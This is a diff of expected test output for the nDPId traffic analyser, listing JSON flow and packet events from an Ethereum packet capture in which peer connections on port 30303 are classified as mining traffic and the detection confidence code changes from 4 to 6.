-00763{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":652,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508365021,"flow_last_seen":1578508365066,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":415,"flow_tot_l4_payload_len":415,"flow_avg_l4_payload_len":103,"midstream":0,"thread_ts_msec":1578508365066,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"178.62.10.218","src_port":56642,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00763{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":652,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508365021,"flow_last_seen":1578508365066,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":415,"flow_tot_l4_payload_len":415,"flow_avg_l4_payload_len":103,"midstream":0,"thread_ts_msec":1578508365066,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"178.62.10.218","src_port":56642,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 
00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":671,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":41,"flow_packet_id":2,"flow_last_seen":1578508365074,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508365074,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADQGtGayPh23wKgBuHZf3UMO43zOltsrhKAScSBk2gAAAgQFrAQCCArDycEqItiWJgEDAwc="} 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":672,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":41,"flow_packet_id":3,"flow_last_seen":1578508365074,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508365074,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGqG7AqAG4sj4dt91Ddl+W2yuEDuN8z4AQECz0awAAAQEICiLYlk3DycEq"} -00763{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":673,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508365029,"flow_last_seen":1578508365075,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":469,"flow_tot_l4_payload_len":469,"flow_avg_l4_payload_len":117,"midstream":0,"thread_ts_msec":1578508365075,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"178.62.29.183","src_port":56643,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 
+00763{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":673,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508365029,"flow_last_seen":1578508365075,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":469,"flow_tot_l4_payload_len":469,"flow_avg_l4_payload_len":117,"midstream":0,"thread_ts_msec":1578508365075,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"178.62.29.183","src_port":56643,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":700,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508365079,"flow_last_seen":1578508365079,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508365079,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"172.105.94.62","src_port":56646,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":700,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":44,"flow_packet_id":1,"flow_last_seen":1578508365079,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1578508365079,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGbbDAqAG4rGlePt1Gdl8dOmrnAAAAALAC\/\/\/VAwAAAgQFtAEDAwUBAQgKItiWUQAAAAAEAgAA"} 
00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":702,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":43,"flow_packet_id":2,"flow_last_seen":1578508365092,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508365092,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADEGSEK524U+wKgBuHZf3UWdKkNsjzbHKaASbCBIRwAAAgQFdAQCCAp\/mc8NItiWMgEDAwc="} 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":703,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":43,"flow_packet_id":3,"flow_last_seen":1578508365092,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508365092,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGOUrAqAG4uduFPt1Fdl+PNscpnSpDbYAQEAzSvAAAAQEICiLYll1\/mc8N"} -00764{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":718,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508365045,"flow_last_seen":1578508365094,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":410,"flow_tot_l4_payload_len":410,"flow_avg_l4_payload_len":102,"midstream":0,"thread_ts_msec":1578508365094,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"185.219.133.62","src_port":56645,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 
+00764{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":718,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508365045,"flow_last_seen":1578508365094,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":410,"flow_tot_l4_payload_len":410,"flow_avg_l4_payload_len":102,"midstream":0,"thread_ts_msec":1578508365094,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"185.219.133.62","src_port":56645,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":728,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508365094,"flow_last_seen":1578508365094,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508365094,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"182.162.161.61","src_port":56647,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":728,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":45,"flow_packet_id":1,"flow_last_seen":1578508365094,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1578508365094,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGIHjAqAG4tqKhPd1Hdl8HffxGAAAAALAC\/\/8MGQAAAgQFtAEDAwUBAQgKItiWYAAAAAAEAgAA"} 
00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":755,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":44,"flow_packet_id":2,"flow_last_seen":1578508365104,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508365104,"pkt":"KDc3AG3IEBMx8Tl2CABFCAA8AABAADMGeqysaV4+wKgBuHZf3UajVVX7HTpq6KAS\/ojIGAAAAgQFrAQCCAobAQsKItiWUQEDAwc="} 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":756,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":44,"flow_packet_id":3,"flow_last_seen":1578508365104,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508365104,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGbbzAqAG4rGlePt1Gdl8dOmroo1VV\/IAQECzlIgAAAQEICiLYlmgbAQsK"} -00763{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":757,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508365079,"flow_last_seen":1578508365105,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":474,"flow_tot_l4_payload_len":474,"flow_avg_l4_payload_len":118,"midstream":0,"thread_ts_msec":1578508365105,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"172.105.94.62","src_port":56646,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 
+00763{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":757,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508365079,"flow_last_seen":1578508365105,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":474,"flow_tot_l4_payload_len":474,"flow_avg_l4_payload_len":118,"midstream":0,"thread_ts_msec":1578508365105,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"172.105.94.62","src_port":56646,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":900,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508365153,"flow_last_seen":1578508365153,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508365153,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"35.228.250.140","src_port":56650,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":900,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":46,"flow_packet_id":1,"flow_last_seen":1578508365153,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1578508365153,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGWefAqAG4I+T6jN1Kdl95PEStAAAAALAC\/\/+LMAAAAgQFtAEDAwUBAQgKItiWjwAAAAAEAgAA"} 
00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":904,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508365154,"flow_last_seen":1578508365154,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508365154,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"138.201.12.87","src_port":56651,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
@@ -212,23 +212,23 @@ 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":924,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":48,"flow_packet_id":1,"flow_last_seen":1578508365169,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1578508365169,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGP33AqAG4sAmI0d1Mdl8ouUvbAAAAALAC\/\/+6CgAAAgQFtAEDAwUBAQgKItiWngAAAAAEAgAA"} 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":928,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":47,"flow_packet_id":2,"flow_last_seen":1578508365186,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508365186,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADIG7zuKyQxXwKgBuHZf3Uu6UG6Lx0dxOqAScSDP1QAAAgQFrAQCCAq1b4mgItiWjwEDAwc="} 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":929,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":47,"flow_packet_id":3,"flow_last_seen":1578508365186,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508365186,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAG4UPAqAG4iskMV91Ldl\/HR3E6ulBujIAQECxfbwAAAQEICiLYlq61b4mg"} 
-00763{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":932,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508365154,"flow_last_seen":1578508365187,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":417,"flow_tot_l4_payload_len":417,"flow_avg_l4_payload_len":104,"midstream":0,"thread_ts_msec":1578508365187,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"138.201.12.87","src_port":56651,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00763{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":932,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508365154,"flow_last_seen":1578508365187,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":417,"flow_tot_l4_payload_len":417,"flow_avg_l4_payload_len":104,"midstream":0,"thread_ts_msec":1578508365187,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"138.201.12.87","src_port":56651,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 
00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":954,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508365189,"flow_last_seen":1578508365189,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508365189,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"85.214.108.52","src_port":56654,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":954,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":49,"flow_packet_id":1,"flow_last_seen":1578508365189,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1578508365189,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGtk3AqAG4VdZsNN1Odl+\/h8KiAAAAALAC\/\/8jMQAAAgQFtAEDAwUBAQgKItiWsAAAAAAEAgAA"} 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":955,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508365189,"flow_last_seen":1578508365189,"flow_idle_time":200000,"flow_min_l4_payload_len":128,"flow_max_l4_payload_len":128,"flow_tot_l4_payload_len":128,"flow_avg_l4_payload_len":128,"midstream":0,"thread_ts_msec":1578508365189,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"18.219.167.159","src_port":30303,"dst_port":30303,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00613{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":955,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":50,"flow_packet_id":1,"flow_last_seen":1578508365189,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":170,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":170,"pkt_l4_len":136,"thread_ts_msec":1578508365189,"pkt":"EBMx8Tl2KDc3AG3ICABFAACcflcAAEARfx\/AqAG4Etunn3Zfdl8AiGnBB7Pc5ZlsDZTbUrqaaoRxeL1l7Crbcxf\/BOXFZNGdyZsOxpmBlW67u9+KWe59CkWnKw2GIsEnEKk87oxTf3me3BvKcrMQD0jXMXlBXiHkLViPnwRaOVxyx4odh7D\/BO97AAHdBMuEfwAAAYJ2X4J2X8mEEtunn4J2X4CEXhYgYQU="} -00765{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":955,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508365189,"flow_last_seen":1578508365189,"flow_idle_time":200000,"flow_min_l4_payload_len":128,"flow_max_l4_payload_len":128,"flow_tot_l4_payload_len":128,"flow_avg_l4_payload_len":128,"midstream":0,"thread_ts_msec":1578508365189,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"18.219.167.159","src_port":30303,"dst_port":30303,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00765{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":955,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508365189,"flow_last_seen":1578508365189,"flow_idle_time":200000,"flow_min_l4_payload_len":128,"flow_max_l4_payload_len":128,"flow_tot_l4_payload_len":128,"flow_avg_l4_payload_len":128,"midstream":0,"thread_ts_msec":1578508365189,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"18.219.167.159","src_port":30303,"dst_port":30303,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe 
Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":987,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508365194,"flow_last_seen":1578508365194,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508365194,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"202.112.28.106","src_port":56655,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":987,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":51,"flow_packet_id":1,"flow_last_seen":1578508365194,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1578508365194,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGkX3AqAG4ynAcat1Pdl84sWAlAAAAALAC\/\/\/nsAAAAgQFtAEDAwUBAQgKItiWswAAAAAEAgAA"} 00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1015,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":48,"flow_packet_id":2,"flow_last_seen":1578508365201,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508365201,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADIGTYGwCYjRwKgBuHZf3UxCOLg9KLlL3KAScSB8NwAAAgQFrAQCCAqsVDbiItiWngEDAwc="} 
00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1016,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":48,"flow_packet_id":3,"flow_last_seen":1578508365202,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508365202,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGP4nAqAG4sAmI0d1Mdl8ouUvcQji4PoAQECwL1AAAAQEICiLYlrqsVDbi"} -00764{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1017,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508365169,"flow_last_seen":1578508365203,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":531,"flow_tot_l4_payload_len":531,"flow_avg_l4_payload_len":132,"midstream":0,"thread_ts_msec":1578508365203,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"176.9.136.209","src_port":56652,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00764{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1017,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508365169,"flow_last_seen":1578508365203,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":531,"flow_tot_l4_payload_len":531,"flow_avg_l4_payload_len":132,"midstream":0,"thread_ts_msec":1578508365203,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"176.9.136.209","src_port":56652,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": 
{"6":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1018,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":46,"flow_packet_id":2,"flow_last_seen":1578508365210,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508365210,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADYGY+sj5PqMwKgBuHZf3UovaHbWeTxErqASbgBmbgAAAgQFjAQCCAqaQodaItiWjwEDAwc="} 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1019,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":46,"flow_packet_id":3,"flow_last_seen":1578508365210,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508365210,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGWfPAqAG4I+T6jN1Kdl95PESuL2h214AQECjytwAAAQEICiLYlsKaQoda"} -00765{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1028,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508365153,"flow_last_seen":1578508365212,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":462,"flow_tot_l4_payload_len":462,"flow_avg_l4_payload_len":115,"midstream":0,"thread_ts_msec":1578508365212,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"35.228.250.140","src_port":56650,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 
+00765{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1028,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508365153,"flow_last_seen":1578508365212,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":462,"flow_tot_l4_payload_len":462,"flow_avg_l4_payload_len":115,"midstream":0,"thread_ts_msec":1578508365212,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"35.228.250.140","src_port":56650,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1061,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":49,"flow_packet_id":2,"flow_last_seen":1578508365223,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508365223,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADIGxFFV1mw0wKgBuHZf3U5vpmVtv4fCo6ASOJBjegAAAgQFrAQCCApls11ZItiWsAEDAwc="} 